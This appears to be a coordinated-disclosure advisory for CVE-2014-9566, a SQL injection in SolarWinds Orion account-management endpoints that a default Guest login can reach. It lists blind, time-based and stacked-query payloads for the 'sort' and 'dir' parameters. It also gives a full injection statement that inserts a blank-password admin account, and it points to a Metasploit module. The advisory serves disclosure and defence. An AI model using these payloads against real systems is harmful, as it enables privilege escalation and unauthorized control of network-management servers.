+IP Address Manager -- < 4.3
+User Device Tracker -- < 3.2
+VoIP & Network Quality Manager -- < 4.2
+Server & Application Monitor -- < 6.2
+Web Performance Monitor -- < 2.2
+
+At first glance, the injections are only available to admins, as the
+requests used are on the Manage Accounts page. However, it seems there is
+no real ACL check on the GetAccounts and GetAccountGroups endpoints of the
+AccountManagement.asmx service, which means that even authenticating as
+Guest allows for exploitation. By default, the Guest account has no
+password and is enabled.
+
+On both the GetAccounts and GetAccountGroups endpoints, the 'sort' and
+'dir' parameters are susceptible to boolean-/time-based, and stacked
+injections. By capturing the AJAX requests made by an admin user to these
+endpoints, authenticating as Guest and replacing the admin cookie with the
+Guest cookie, you can still make a successful request, and thus a
+successful exploitation vector for any authenticated user.
+
+Being a stacked injection, this becomes a privilege escalation at the very
+least, as an attacker is able to insert their own admin user. A pull
+request for a Metasploit module which should achieve this on any product
+using the Orion service as the core authentication management system, using
+the GetAccounts endpoint, has been made (
+https://github.com/rapid7/metasploit-framework/pull/4836). By default, the
+module attempts to authenticate as the Guest user with a blank password,
+then exploit the SQL injection to insert a new admin with a blank password.
+
+I am not sure if the non-trial versions allow you to specify your own SQL
+server, but the trials install a SQL Server Express instance. The SQL user
+that the application uses is not an administrator, and the xp_cmd_shell
+stored procedure is unavailable.
+
+Within the GetAccounts endpoint:
+
+Parameter: dir (GET)
+
+    Type: boolean-based blind
+    Title: Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause
+    Payload: sort=Accounts.AccountID&dir=ASC,(SELECT (CASE WHEN (5791=5791)
+THEN CHAR(65)+CHAR(83)+CHAR(67) ELSE 5791*(SELECT 5791 FROM
+master..sysdatabases) END))
+
+    Type: stacked queries
+    Title: Microsoft SQL Server/Sybase stacked queries
+    Payload: sort=Accounts.AccountID&dir=ASC; WAITFOR DELAY '0:0:5'--
+
+    Type: AND/OR time-based blind
+    Title: Microsoft SQL Server/Sybase time-based blind
+    Payload: sort=Accounts.AccountID&dir=ASC WAITFOR DELAY '0:0:5'--
+
+
+Parameter: sort (GET)
+
+    Type: boolean-based blind
+    Title: Microsoft SQL Server/Sybase boolean-based blind - Parameter
+replace (original value)
+    Payload: sort=(SELECT (CASE WHEN (8998=8998) THEN
+CHAR(65)+CHAR(99)+CHAR(99)+CHAR(111)+CHAR(117)+CHAR(110)+CHAR(116)+CHAR(115)+CHAR(46)+CHAR(65)+CHAR(99)+CHAR(99)+CHAR(111)+CHAR(117)+CHAR(110)+CHAR(116)+CHAR(73)+CHAR(68)
+ELSE 8998*(SELECT 8998 FROM master..sysdatabases) END))&dir=ASC
+
+    Type: stacked queries
+    Title: Microsoft SQL Server/Sybase stacked queries
+    Payload: sort=Accounts.AccountID; WAITFOR DELAY '0:0:5'--&dir=ASC
+
+    Type: AND/OR time-based blind
+    Title: Microsoft SQL Server/Sybase time-based blind
+    Payload: sort=Accounts.AccountID WAITFOR DELAY '0:0:5'--&dir=ASC
+
+
+
+Within the GetAccountGroups endpoint, very similar injection techniques are
+available:
+
+Parameter: dir (GET)
+
+    Type: boolean-based blind
+    Title: Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause
+    Payload: sort=Accounts.GroupPriority&dir=ASC,(SELECT (CASE WHEN
+(8799=8799) THEN CHAR(65)+CHAR(83)+CHAR(67) ELSE 8799*(SELECT 8799 FROM
+master..sysdatabases) END))
+
+    Type: stacked queries
+    Title: Microsoft SQL Server/Sybase stacked queries
+    Payload: sort=Accounts.GroupPriority&dir=ASC; WAITFOR DELAY '0:0:5'--
+
+    Type: AND/OR time-based blind
+    Title: Microsoft SQL Server/Sybase time-based blind
+    Payload: sort=Accounts.GroupPriority&dir=ASC WAITFOR DELAY '0:0:5'--
+
+
+Parameter: sort (GET)
+
+    Type: boolean-based blind
+    Title: Microsoft SQL Server/Sybase boolean-based blind - Parameter
+replace (original value)
+    Payload: sort=(SELECT (CASE WHEN (1817=1817) THEN
+CHAR(65)+CHAR(99)+CHAR(99)+CHAR(111)+CHAR(117)+CHAR(110)+CHAR(116)+CHAR(115)+CHAR(46)+CHAR(71)+CHAR(114)+CHAR(111)+CHAR(117)+CHAR(112)+CHAR(80)+CHAR(114)+CHAR(105)+CHAR(111)+CHAR(114)+CHAR(105)+CHAR(116)+CHAR(121)
+ELSE 1817*(SELECT 1817 FROM master..sysdatabases) END))&dir=ASC
+
+    Type: stacked queries
+    Title: Microsoft SQL Server/Sybase stacked queries
+    Payload: sort=Accounts.GroupPriority; WAITFOR DELAY '0:0:5'--&dir=ASC
+
+    Type: AND/OR time-based blind
+    Title: Microsoft SQL Server/Sybase time-based blind
+    Payload: sort=Accounts.GroupPriority WAITFOR DELAY '0:0:5'--&dir=ASC
+
+
+An example injection to insert an admin user named notadmin with a blank
+password using the 'dir' parameter would be:
+
+ASC;insert into accounts values ('notadmin', '127-510823478-74417-8',
+'/+PA4Zck3arkLA7iwWIugnAEoq4ocRsYjF7lzgQWvJc+pepPz2a5z/L1Pz3c366Y/CasJIa7enKFDPJCWNiKRg==',
+'Feb  1 2100 12:00AM', 'Y', 'notadmin', 1, '', '', 1, -1, 8, -1, 4, 0, 0,
+0, 0, 0, 0, 'Y', 'Y', 'Y', 'Y', 'Y', '', '', 0, 0, 0, 'N', 'Y', '', 1, '',
+0, '');
+
+This vulnerability was reported to Solarwinds on Dec 8th, 2014 and was
+assigned the CVE identifier CVE-2014-9566. A coordinated disclosure date of
+Feb 24th, 2015 was chosen by both parties. I would like to thank Rob Hock,
+Group Product Manager – Network Management at Solarwinds for the easy
+coordination (you should still have a bug bounty though!).
+
+i can has crazy cool vuln name, yaes? wat about Polarbends, or Molarfriends?
+
+i dub thee Molarfriends vulnerability. wheres my markketing tem...
+
+-- 
+http://volatile-minds.blogspot.com -- blog
+http://www.volatileminds.net -- website